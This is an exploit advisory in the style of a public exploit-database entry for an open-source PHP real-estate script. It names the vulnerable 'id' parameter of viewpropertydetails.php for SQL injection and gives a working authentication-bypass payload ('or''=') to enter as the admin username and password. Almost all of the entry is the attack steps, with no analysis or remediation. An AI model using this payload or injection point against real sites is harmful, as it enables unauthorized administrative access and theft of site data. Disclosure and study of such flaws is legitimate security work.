# # # # # # Vulnerability: SQL Injection + Admin Login Bypass # Date: 13.01.2017 # Vendor Homepage: http://phprealestatescript.org/ # Script Name: Open Source Real-Estate Script # Script Buy Now: http://phprealestatescript.org/open-source-real-estate-script.html # Author: İhsan Şencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/viewpropertydetails.php?id=[SQL] # # Admin Login Bypass # http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. # # # # #